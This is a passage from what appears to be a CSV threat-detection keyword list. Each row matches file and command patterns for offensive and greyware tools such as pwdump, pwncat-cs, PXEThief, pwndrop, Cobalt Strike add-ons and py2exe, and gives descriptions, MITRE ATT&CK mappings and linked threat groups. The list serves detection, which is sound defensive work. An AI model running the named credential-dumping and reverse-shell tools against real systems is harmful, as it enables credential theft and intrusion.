-*PURPLEPANDA_NEO4J_URL=*,offensive_tool_keyword,PurplePanda,This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.,T1595 - T1078 - T1583 - T1087 - T1526,TA0003 - TA0004 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/carlospolop/PurplePanda,1,1,N/A,N/A,6,569,80,2023-08-07T04:13:59Z,2022-01-01T12:10:40Z
-*purplepanda_prints.py*,offensive_tool_keyword,PurplePanda,This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. 
Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.,T1595 - T1078 - T1583 - T1087 - T1526,TA0003 - TA0004 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/carlospolop/PurplePanda,1,1,N/A,N/A,6,569,80,2023-08-07T04:13:59Z,2022-01-01T12:10:40Z
-*PURPLEPANDA_PWD=*,offensive_tool_keyword,PurplePanda,This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.,T1595 - T1078 - T1583 - T1087 - T1526,TA0003 - TA0004 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/carlospolop/PurplePanda,1,1,N/A,N/A,6,569,80,2023-08-07T04:13:59Z,2022-01-01T12:10:40Z
-*PurpleSharp.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z
-*putterpanda_whoami*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z
-*puttygen.exe 
FUZZ*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,0,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z
-*puzzlepeaches/NTLMRecon*,offensive_tool_keyword,NTMLRecon,Enumerate information from NTLM authentication enabled web endpoints,T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001,TA0009 - TA0007 - TA0006,N/A,N/A,Discovery,https://github.com/puzzlepeaches/NTLMRecon,1,1,N/A,8,1,32,3,2023-08-16T14:34:10Z,2023-08-09T12:10:42Z
-*PWCrack*,offensive_tool_keyword,PWCrack,cracking tool for multiple hash type,T1110 - T1111 - T1210 - T1558.002 - T1555,TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/L-codes/pwcrack-framework,1,1,N/A,N/A,5,456,57,2023-09-27T08:26:21Z,2018-07-01T08:33:55Z
-*pwd*/*/rules/best64.rule*,offensive_tool_keyword,AD exploitation cheat sheet,Crack the hash with Hashcat,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*pwd_dump *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-*PWDump *,signature_keyword,Antivirus Signature,Antivirus signature - a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. 
This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems,N/A,N/A,N/A,N/A,Credential Access,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*PWDump.*,offensive_tool_keyword,pwdump,a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems,T1003 - T1027 - T1055 - T1056 - T1059 - T1078 - T1087 - T1098 - T1110 - T1212 - T1547,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://ftp.samba.org/pub/samba/pwdump/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*pwdump.exe*,offensive_tool_keyword,fgdump,A utility for dumping passwords on Windows NT/2000/XP/2003 machines,T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001,TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008,N/A,Volt Typhoon,Credential Access,https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*-PWDumpFormat*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*pw-inspector -*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z
-*pw-inspector.*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z
-*pwn_jenkins*,offensive_tool_keyword,pwn_jenkins,Remote Code Execution for jenkins,T1216 - T1210 - T1573,TA0002 - TA0003,N/A,N/A,Exploitation 
tools,https://github.com/gquere/pwn_jenkins,1,0,N/A,N/A,10,1681,298,2023-03-09T09:16:14Z,2018-07-18T14:24:27Z
-*pwn1sher/CS-BOFs*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z
-*pwn1sher/WMEye*,offensive_tool_keyword,WMEye,WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement,T1210 - T1570,TA0001 - TA0002 - TA0003 - TA0004 - TA0009,N/A,N/A,POST Exploitation tools,https://github.com/pwn1sher/WMEye,1,1,N/A,N/A,4,334,54,2021-12-24T05:38:50Z,2021-09-07T08:18:30Z
-*pwnagotchi*,offensive_tool_keyword,pwnagotchi,Pwnagotchi is an A2C-based AI leveraging bettercap that learns from its surrounding WiFi environment to maximize the crackable WPA key material it captures (either passively. or by performing authentication and association attacks). 
This material is collected as PCAP files containing any form of handshake supported by hashcat. including PMKIDs. full and half WPA handshakes,T1562.004 - T1040 - T1557.001,TA0002 - TA0003 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/evilsocket/pwnagotchi,1,0,N/A,N/A,10,6215,976,2023-07-25T00:15:21Z,2019-09-19T13:07:15Z
-*pwnat.exe*,offensive_tool_keyword,pwnat,pwnat. by Samy Kamkar. is a tool that allows any client behind a NAT to communicate with a server behind a separate NAT with *no* port forwarding and *no* DMZ setup on any routers in order to directly communicate with each other. Simply put. this is a proxy server that works behind a NAT. even when the client is also behind a NAT,T1584 - T1571 - T1210.001,TA0009 - TA0002,N/A,N/A,Defense Evasion,https://github.com/samyk/pwnat,1,0,N/A,N/A,10,2861,456,2023-08-08T05:09:00Z,2012-08-10T05:55:11Z
-*pwncat-cs *:*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*pwncat-cs -lp *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*pwncat-cs ssh://*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation 
tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*pwndb --target @* --output *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*pwndrop install*,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,0,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z
-*pwndrop start*,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,0,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z
-*pwndrop status*,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,0,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z
-*pwndrop stop*,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,0,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z
-*pwndrop-linux-amd64*,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,1,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z
-*pwndrop-master*,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,1,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z
-*pwned_x64/notepad.exe*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z
-*Pwned-creds_Domainpasswordspray.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z
-*pwnedornot.py -d *,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*pwned-passwords-ntlm*,offensive_tool_keyword,ShuckNT,ShuckNT is the script of Shuck.sh online service for on-premise use. 
It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES),T1552.001 - T1555.003 - T1078.003,TA0006 - TA0002 - TA0040,N/A,N/A,Credential Access,https://github.com/yanncam/ShuckNT,1,1,N/A,10,1,36,4,2023-02-02T10:40:59Z,2023-01-27T07:52:47Z
-*pwnkit *,offensive_tool_keyword,POC,Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team,T1068,TA0004,N/A,N/A,Exploitation tools,https://github.com/Ayrx/CVE-2021-4034,1,0,N/A,N/A,1,97,16,2022-01-27T11:57:05Z,2022-01-26T03:33:47Z
-*pwnkit64decoded.c*,offensive_tool_keyword,POC,exploitation of CVE-2021-4034,T1210,N/A,N/A,N/A,Exploitation tools,https://github.com/luijait/PwnKit-Exploit,1,1,N/A,N/A,1,79,14,2022-02-07T15:42:00Z,2022-01-26T18:01:26Z
-*pwnsauc3/RWXFinder*,offensive_tool_keyword,rwxfinder,The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section,T1059.001 - T1059.003 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Discovery,https://github.com/pwnsauc3/RWXFinder,1,1,N/A,5,1,89,12,2023-07-15T15:42:55Z,2023-07-14T07:47:21Z
-*pwsafe2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*pxethief *,offensive_tool_keyword,pxethief,PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager,T1555.004 - T1555.002,TA0006,N/A,N/A,Credential Access,https://github.com/MWR-CyberSec/PXEThief,1,0,N/A,N/A,3,220,27,2023-05-18T19:55:17Z,2022-08-12T22:16:46Z
-*pxethief.py*,offensive_tool_keyword,pxethief,PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager,T1555.004 - 
T1555.002,TA0006,N/A,N/A,Credential Access,https://github.com/MWR-CyberSec/PXEThief,1,1,N/A,N/A,3,220,27,2023-05-18T19:55:17Z,2022-08-12T22:16:46Z
-*py2exe *,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,0,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z
-*py2exe*.exe *,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,0,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z
-*py2exe*.msi *,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,0,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z
-*py2exe*.py*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,0,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z
-*py2exe-*.tar.gz*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,1,greyware_tools high risks of false 
positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -*py2exe-*.whl*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,1,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -*py2exe.build_exe*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,1,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -*py2exe.freeze*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,1,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -*py2exe.git*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,1,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -*py2exe_setuptools.py*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,1,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z 
-*py2exe-master.zip*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,1,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -*pycobalt.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*pycobalt/aggressor*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 
- T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*pycobalt_debug_on*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*pycobalt_path*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*pycobalt_python*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
